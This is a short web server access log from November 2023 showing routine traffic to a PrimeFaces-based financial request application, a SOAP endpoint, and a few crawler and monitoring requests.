186.154.39.23 - - [29/Nov/2023:02:15:41 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.39.23 - - [29/Nov/2023:02:15:43 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12780
186.154.39.23 - - [29/Nov/2023:02:15:48 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 43921
186.154.39.23 - - [29/Nov/2023:02:15:49 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.39.23 - - [29/Nov/2023:02:15:49 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.39.23 - - [29/Nov/2023:02:15:49 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.39.23 - - [29/Nov/2023:02:15:49 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.39.23 - - [29/Nov/2023:02:15:49 -0500] "GET /sipse/faces/javax.faces.resource/fileupload/fileupload.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Nov/2023:02:16:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41354
201.245.192.253 - - [29/Nov/2023:02:16:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42143
186.154.39.23 - - [29/Nov/2023:02:16:44 -0500] "POST /sipse/faces/presentacion/financiero/solicitudAnulacion/registrarSolicitudAnulacion.xhtml HTTP/1.1" 200 50145
186.154.39.23 - - [29/Nov/2023:02:16:45 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.154.39.23 - - [29/Nov/2023:02:16:45 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.39.23 - - [29/Nov/2023:02:16:45 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.39.23 - - [29/Nov/2023:02:16:45 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.39.23 - - [29/Nov/2023:02:16:45 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.39.23 - - [29/Nov/2023:02:16:45 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.39.23 - - [29/Nov/2023:02:16:45 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.39.23 - - [29/Nov/2023:02:16:45 -0500] "GET /sipse/faces/javax.faces.resource/fileupload/fileupload.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.39.23 - - [29/Nov/2023:02:16:45 -0500] "GET /sipse/faces/javax.faces.resource/fileupload/fileupload.css?ln=primefaces&v=4.0 HTTP/1.1" 200 1330
186.154.39.23 - - [29/Nov/2023:02:16:45 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.154.39.23 - - [29/Nov/2023:02:16:45 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 200 27209
5.255.231.136 - - [29/Nov/2023:02:16:56 -0500] "GET /robots.txt HTTP/1.1" 404 1018
5.255.231.34 - - [29/Nov/2023:02:16:58 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [29/Nov/2023:02:17:29 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [29/Nov/2023:02:18:15 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41956
186.154.39.23 - - [29/Nov/2023:02:18:56 -0500] "POST /sipse/faces/presentacion/financiero/solicitudAnulacion/registrarSolicitudAnulacion.xhtml HTTP/1.1" 200 52518
186.154.39.23 - - [29/Nov/2023:02:18:56 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.39.23 - - [29/Nov/2023:02:18:56 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.154.39.23 - - [29/Nov/2023:02:18:56 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.39.23 - - [29/Nov/2023:02:18:56 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.39.23 - - [29/Nov/2023:02:18:56 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.39.23 - - [29/Nov/2023:02:18:56 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.39.23 - - [29/Nov/2023:02:18:56 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.39.23 - - [29/Nov/2023:02:18:56 -0500] "GET /sipse/faces/javax.faces.resource/fileupload/fileupload.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.39.23 - - [29/Nov/2023:02:18:56 -0500] "GET /sipse/faces/javax.faces.resource/fileupload/fileupload.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.39.23 - - [29/Nov/2023:02:18:56 -0500] "GET /sipse/imagenes/cargando.gif HTTP/1.1" 200 17770
186.154.39.23 - - [29/Nov/2023:02:18:56 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 200 5355
186.154.39.23 - - [29/Nov/2023:02:19:01 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.154.39.23 - - [29/Nov/2023:02:19:01 -0500] "POST /sipse/faces/presentacion/financiero/solicitudAnulacion/registrarSolicitudAnulacion.xhtml HTTP/1.1" 200 29207
186.154.39.23 - - [29/Nov/2023:02:19:04 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.39.23 - - [29/Nov/2023:02:19:04 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
